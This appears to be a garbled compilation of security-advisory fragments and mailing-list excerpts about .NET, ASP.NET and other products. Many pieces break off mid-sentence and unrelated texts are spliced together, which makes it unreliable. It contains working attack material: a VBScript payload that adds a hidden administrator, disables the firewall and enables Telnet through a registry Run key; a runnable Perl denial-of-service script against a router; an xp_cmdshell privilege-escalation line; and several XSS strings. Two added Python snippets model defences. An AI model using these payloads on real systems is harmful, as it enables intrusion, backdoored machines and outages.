------------------------------------------------------------------------
.NET Framework EncoderParameter integer overflow vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2011
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An integer overflow vulnerability has been discovered in the
EncoderParameter class of the .NET Framework. Exploiting this
------------------------------------------------------------------------
Yorick Koster, June 2010
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A logic flaw has been found in the way .NET grants permissions to
ClickOnce applications. Combined with the relaxed security warnings shown
when handling OLE Packages in Office 2007, this allows attackers to run
arbitrary .NET assemblies with Full Trust permissions.
------------------------------------------------------------------------
3. *Vulnerability Description*
Novell iManager is a Web-based administration console that provides
customized secure access to network administration utilities and
content from any location in the world. With iManager you can manage
Novell Open Enterprise Server, Novell Identity Manager, Novell
eDirectory and many other Novell and third-party services from a web
browser. Novell iManager is prone to a stack-based buffer overflow
vulnerability that can be exploited by authenticated users to execute
SEC Consult Vulnerability Lab Security Advisory < 20111230-0 >
=======================================================================
title: Microsoft ASP.NET Forms Authentication Bypass
product: Microsoft .NET Framework
vulnerable version: Microsoft .NET Framework Version:4.0.30319;
ASP.NET Version:4.0.30319.237 and below
fixed version: MS11-100
CVE: CVE-2011-3416
impact: critical
homepage: http://www.microsoft.com/net
I respectfully defend our statement as very realistic. The .Net exploit provided in the advisory is all that is required to work; no code-behind is required because the vulnerability related to "innerhtml" lies in the .Net code.
The specific flaw is actually in System.Web.UI.HTMLControls.HtmlContainerControl class, which is the super class of the HTMLForm control (among others). The bug is easy to spot in the LoadViewState method as revealed in .Net Reflector:
protected override void LoadViewState(object savedState)
{
if (savedState != null)
{
base.LoadViewState(savedState);
// ... remainder of the method is not included in this excerpt
}
}
Vendor informed: 13th December 2007
Severity: Medium-high
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services
Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.
We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7 . In this blog post, we will look into the details of a number of
security problems discovered by Acunetix WVS in CubeCart.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3;
Hi,
Please find the following Advisory
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=37
Regards
DokFLeed
====================================================
Advisory No.: ISNSC-0910
=============
ChartDirector Critical File Access
> GET /index.php?page=Poem/Poem.php HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
...and how did you confirm that? By seeing Silverlight in the accepted
mime-types header? Silverlight is a plugin which is a lot like the Flex
framework for Flash, only for .Net. So, I guess you have a Silverlight
application installed to play .WAV files, but this does not change the
fact that anything outside of IE (which has the Silverlight extension
installed) will use whatever the default media player is on your PC.
> Accept-Language: en-au
While discussion of the vulnerability is great, it would be nice for us to retain some credit; the advisory represents the culmination of a lot of research work. The PDF that accompanies the hacking-lab movie is basically just a copy & paste from our advisory with no attribution. Anyone that goes to the hacking-lab website directly would incorrectly assume that the movie & PDF represent original research work by Compass Security.
I imagine that videos of our BlackHat presentation (http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Byrne ) will hit the web soon too. We have a live demo of the .Net vulnerability and the JavaServer Faces exploit.
Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
#######################################################################
Luigi Auriemma
Application: MG-SOFT Net Inspector
http://www.mg-soft.com/netinsp.html
(bug C affects any MgWTrap3 service which is included in
almost all the MG-SOFT products like MIB Browser, Query
Manager, Trap Ringer Pro and so on)
Versions: Net Inspector <= 6.5.0.828
1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec
The CFP committee will review all submissions and determine the final
list of speakers for SyScan’08.
CONFERENCE TOPICS
The focus for SyScan’08 will include the following:
> Your paper seems to say you only tested this on IE 5.5 and IE6 (no
> mention of IE7), so does is that the case, or am I just doing it
> wrong?
>
> 2008/8/22 ProCheckUp Research <research@procheckup.com>:
> The Microsoft .NET framework comes with a request validation feature,
> configurable by the ValidateRequest setting. ValidateRequest has been a
> feature of ASP.NET since version 1.1. This feature consists of a series
> of filters, designed to prevent classic web input validation attacks
> such as HTML injection and XSS (Cross-site Scripting). This paper
> introduces script injection payloads that bypass ASP .NET web validation
Hi all,
There is an ongoing conversation about a potential XSS with ViewState of
the .NET framework. However, some were not able to reproduce the issue
and therefore we decided to prepare a short and high resolution movie.
http://www.hacking-lab.com/download/
Regards
Ivan
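As an added example, not code from the page, from Trustwave or from ASP.NET itself, the following Python models the control that decides whether the "innerhtml" round-trip described in David Byrne's message is reachable at all. ViewState is client-held, and LoadViewState assigns whatever "innerhtml" value comes back to InnerHtml verbatim, with no encoding, so the only thing standing between an attacker and the page is the MAC that ASP.NET appends to the serialised state when enableViewStateMac is on (HMAC over the state bytes; SHA1 is used here). The serialisation below is a JSON dict rather than ASP.NET's ObjectStateFormatter format, and the key, field names and payload are constructed for the demo.

```python
# Added example: minimal model of MAC-protected vs. unprotected ViewState.
# Not ASP.NET's code; ObjectStateFormatter is replaced by JSON for clarity.
import base64
import hashlib
import hmac
import json

MAC_LEN = hashlib.sha1().digest_size  # 20-byte HMAC-SHA1 tag appended to the state


def protect(state: dict, key: bytes, mac: bool = True) -> str:
    """Server side: serialise the state and, if MAC is on, append HMAC(key, data)."""
    data = json.dumps(state, sort_keys=True).encode()
    if mac:
        data += hmac.new(key, data, hashlib.sha1).digest()
    return base64.b64encode(data).decode()


def unprotect(blob: str, key: bytes, mac: bool = True) -> dict:
    """Server side on postback: verify the tag (constant-time) before trusting the state."""
    raw = base64.b64decode(blob)
    if mac:
        data, tag = raw[:-MAC_LEN], raw[-MAC_LEN:]
        expected = hmac.new(key, data, hashlib.sha1).digest()
        if not hmac.compare_digest(tag, expected):
            raise ValueError("ViewState MAC validation failed")
    else:
        data = raw
    return json.loads(data)


def load_view_state(blob: str, key: bytes, mac: bool) -> str:
    """Model of HtmlContainerControl.LoadViewState: the restored 'innerhtml' value is
    assigned to InnerHtml as-is, so nothing here encodes it."""
    state = unprotect(blob, key, mac)
    return state.get("innerhtml", "")


def tamper(blob: str, mac: bool) -> str:
    """Attacker side: decode the client-held state, swap innerhtml, re-encode without the key.
    With MAC on, the old tag is carried over unchanged and no longer matches the edited data."""
    raw = base64.b64decode(blob)
    data, tag = (raw[:-MAC_LEN], raw[-MAC_LEN:]) if mac else (raw, b"")
    state = json.loads(data)
    state["innerhtml"] = "<script>alert(document.cookie)</script>"  # constructed payload
    return base64.b64encode(json.dumps(state, sort_keys=True).encode() + tag).decode()


def demo(mac: bool) -> str:
    """Round trip one tampered postback; returns what InnerHtml would become,
    or the rejection message when MAC validation stops it."""
    key = b"constructed-machineKey-for-demo"  # stands in for <machineKey validationKey>
    server_blob = protect({"innerhtml": "<p>hello</p>"}, key, mac)
    try:
        return load_view_state(tamper(server_blob, mac), key, mac)
    except ValueError as e:
        return f"rejected: {e}"


if __name__ == "__main__":
    print("enableViewStateMac=false ->", demo(mac=False))
    print("enableViewStateMac=true  ->", demo(mac=True))
```

With the MAC disabled the crafted innerhtml reaches InnerHtml unchanged; with it enabled the edited blob fails validation before LoadViewState ever sees it. Whether a particular test page reproduces the issue therefore depends on that setting (and on the attacker not holding the validation key), which is worth checking before concluding the bug is absent.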
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I decided to release a PoC exploit for Win2k3 that allows code execution under the SYSTEM account.
Basically, if you can run code under any service in Win2k3 then you can own Windows; this is because Windows service accounts can impersonate.
Other processes (not services) that can impersonate are IIS 6 worker processes, so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recommend not allowing users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
Paper Name
===========
.NET Framework Rootkits - Backdoors inside your Framework
Author: Erez Metula
Paper Description
=================
GET /index.php?page=Poem/Poem.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
Accept-Language: en-au
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Host: www.footprints-inthe-sand.com
Connection: Keep-Alive
It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)
Updated:
Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)
Bug Description :
Mercurycom routers are commonly used for Internet connectivity in home or small office settings. (http://www.mercurycom.com.cn/Product/list)
The HTTP service of the Mercurycom MR804 router contains a denial of service vulnerability in its handling of HTTP header fields (such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc.).
POC:
#-------------------------------------------------------------
Accept: */*
Accept-Language: ru
Referer: http://127.0.0.1:8080/index.php
Content-Type: application/x-www-form-urlencoded;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)
Host: 127.0.0.1:8080
Content-Length: 105
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0
The Microsoft .NET framework comes with a request validation feature,
configurable by the ValidateRequest setting. ValidateRequest has been a
feature of ASP.NET since version 1.1. This feature consists of a series
of filters, designed to prevent classic web input validation attacks
such as HTML injection and XSS (Cross-site Scripting). This paper
introduces script injection payloads that bypass ASP .NET web validation
filters and also details the trial-and-error procedure that was followed
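As an added example, not code from the page, from Microsoft or from ProCheckUp, the following Python re-implements the character-level test that ASP.NET's request validation applies to each request field, as it appears when CrossSiteScriptingValidation.IsDangerousString is decompiled from .NET 4.x (the same two-character test has been in place since ASP.NET 2.0): a value is rejected when it contains "<" followed by a letter, "!", "/" or "?", or "&" followed by "#". The sample inputs are constructed for the demo. It shows why the feature is only a safety net: anything that avoids those two byte pairs passes the filter, and encoding at the output point remains the real control.

```python
# Added example: re-implementation of ASP.NET request validation's string test,
# alongside the output encoding that actually prevents the injection.
import html


def is_dangerous_string(s: str) -> bool:
    """Mirror of the '<' / '&' next-character check. True means ASP.NET would raise
    HttpRequestValidationException for this field value."""
    i = 0
    while True:
        # IndexOfAny(['<', '&'], i)
        n = -1
        for k in range(i, len(s)):
            if s[k] in "<&":
                n = k
                break
        if n < 0 or n == len(s) - 1:
            return False          # no candidate, or candidate is the last character
        nxt = s[n + 1]
        if s[n] == "<":
            if ("a" <= nxt <= "z") or ("A" <= nxt <= "Z") or nxt in "!/?":
                return True
        elif s[n] == "&":
            if nxt == "#":
                return True
        i = n + 1


def validate_request(fields: dict) -> dict:
    """Apply the filter to every field; returns the subset the framework would reject."""
    return {k: v for k, v in fields.items() if is_dangerous_string(v)}


def render_unsafe(value: str) -> str:
    """What a page does when it relies on ValidateRequest alone: raw echo into HTML."""
    return f"<div>{value}</div>"


def render_encoded(value: str) -> str:
    """The real defence: HTML-encode at the output point regardless of request validation."""
    return f"<div>{html.escape(value, quote=True)}</div>"


# Constructed sample field values. The first two are rejected by the filter; the last two
# pass it, yet still need encoding before they are echoed into a page. Whether a given
# browser does anything with a value that passed is a separate question from the filter.
SAMPLES = {
    "classic": "<script>alert(1)</script>",        # '<' + letter
    "entity": "&#60;img src=x onerror=alert(1)>",   # '&' + '#'
    "tilde": "<~x onmouseover=alert(1)>",            # '<' + '~': not in the filter's list
    "attr_breakout": '" onmouseover="alert(1)',     # no '<' or '&#' at all
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        flag = "REJECTED" if is_dangerous_string(value) else "passes  "
        print(f"{name:14} {flag}  raw={render_unsafe(value)!r}  encoded={render_encoded(value)!r}")
```

Run it to see that both "passing" samples reach render_unsafe unchanged while render_encoded neutralises all four; that asymmetry, not the size of the blocklist, is the point of the paper's trial-and-error approach.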
*About SyScan'08*
The Symposium on Security for Asia Network aims to be a very different
security conference from the rest of the security conferences that the
information security community in Asia has come to be so familiar with
and frustrated by.
SyScan is a non-product, non-vendor biased security conference. It is
the aspiration of SyScan to congregate in Asia the best security experts
in their various fields, to share their research, discovery and
experience with all security enthusiasts in Asia.
<script language='vbscript'>
group="HKEY_LOCAL_MACHINE"
section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
key="sun-tzu"
valType=1 'REG_SZ
value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config TlntSvr start= auto & net start TlntSvr & echo whatthefuck(!) & pause" 'you meretrix...
HPRevolutionRegistryManager.WriteRegistry group ,section ,key ,valType ,value 'die of miserable death mommy
</script>
</html>
original url: http://retrogod.altervista.org/telecom_regkey.html
#!/usr/bin/perl
# Excerpt of the advisory's PoC, completed so it runs: strict/Socket, ARGV handling and the
# send were added; the request line and the construction of $evil are not in the excerpt
# (assumed here as "/" and a value taken from the command line, respectively).
use strict; use warnings; use Socket;
my ($test_ip, $test_port, $evil) = @ARGV;
die "usage: $0 <ip> <port> <If-Unmodified-Since value>\n" unless defined $evil;
my $request = "GET / HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
my $test_target=inet_aton($test_ip) or die "bad ip: $test_ip\n";
$test_target=sockaddr_in($test_port, $test_target);
socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die "socket: $!";
connect($sock, $test_target) or die "connect: $!";
send($sock, $request, 0); close($sock);
> a password on the hidden admin account.
In XP Professional the default admin account is not hidden, only in XP Home
Edition. And the default admin password can be changed not only in safe mode,
but in normal mode from any admin account (in both XP Professional and XP
HE). In particular, it can be done at the command prompt with the "net" command.
> Try the "net user password ..." command (from the CMD prompt). That'll
> save you from having to do it in safe mode.
Garrett, you mean the next command:
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt
Published: 04/11/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer